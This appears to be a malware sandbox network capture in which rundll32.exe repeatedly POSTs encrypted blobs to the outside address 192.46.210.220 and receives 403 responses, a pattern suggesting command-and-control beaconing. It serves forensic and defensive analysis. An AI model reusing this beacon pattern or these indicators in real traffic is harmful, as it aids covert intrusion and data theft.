Timestamp: 2021-10-28 03:05:42 UTC | kBytes transferred: 276 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:42 UTC | kBytes transferred: 276 | Direction: OUT
Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:43 UTC | kBytes transferred: 281 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:43 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 57
Source IP: 192.168.2.3
Source Port: 50021
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:43 UTC | kBytes transferred: 281 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:43 UTC | kBytes transferred: 281 | Direction: OUT
Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:44 UTC | kBytes transferred: 286 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 58
Source IP: 192.168.2.3
Source Port: 50034
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:46 UTC | kBytes transferred: 286 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:46 UTC | kBytes transferred: 286 | Direction: OUT
Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:47 UTC | kBytes transferred: 291 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:47 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 59
Source IP: 192.168.2.3
Source Port: 50039
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:47 UTC | kBytes transferred: 291 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:47 UTC | kBytes transferred: 291 | Direction: OUT
Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:48 UTC | kBytes transferred: 296 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:48 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 6
Source IP: 192.168.2.3
Source Port: 49770
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:04:00 UTC | kBytes transferred: 29 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:04:00 UTC | kBytes transferred: 29 | Direction: OUT
Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:04:01 UTC | kBytes transferred: 39 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 60
Source IP: 192.168.2.3
Source Port: 50057
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:50 UTC | kBytes transferred: 296 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:50 UTC | kBytes transferred: 296 | Direction: OUT
Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:51 UTC | kBytes transferred: 301 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:51 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
61 | 192.168.2.3 | 50061 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:51 UTC | 301 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:51 UTC | 301 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:05:52 UTC | 306 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:52 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
62 | 192.168.2.3 | 50067 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:54 UTC | 306 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:54 UTC | 306 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:05:55 UTC | 311 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:55 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
63 | 192.168.2.3 | 50069 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:55 UTC | 311 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:55 UTC | 311 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:05:56 UTC | 316 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:55 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
64 | 192.168.2.3 | 50075 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:58 UTC | 316 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:58 UTC | 316 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:05:59 UTC | 321 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
65 | 192.168.2.3 | 50077 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:59 UTC | 321 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:59 UTC | 321 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:05:59 UTC | 326 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
66 | 192.168.2.3 | 50083 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:02 UTC | 326 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:02 UTC | 326 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:02 UTC | 331 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:02 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
67 | 192.168.2.3 | 50085 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:03 UTC | 331 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:03 UTC | 331 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:03 UTC | 335 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:03 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
68 | 192.168.2.3 | 50092 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:07 UTC | 336 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:07 UTC | 336 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:06:08 UTC | 345 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
69 | 192.168.2.3 | 50093 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
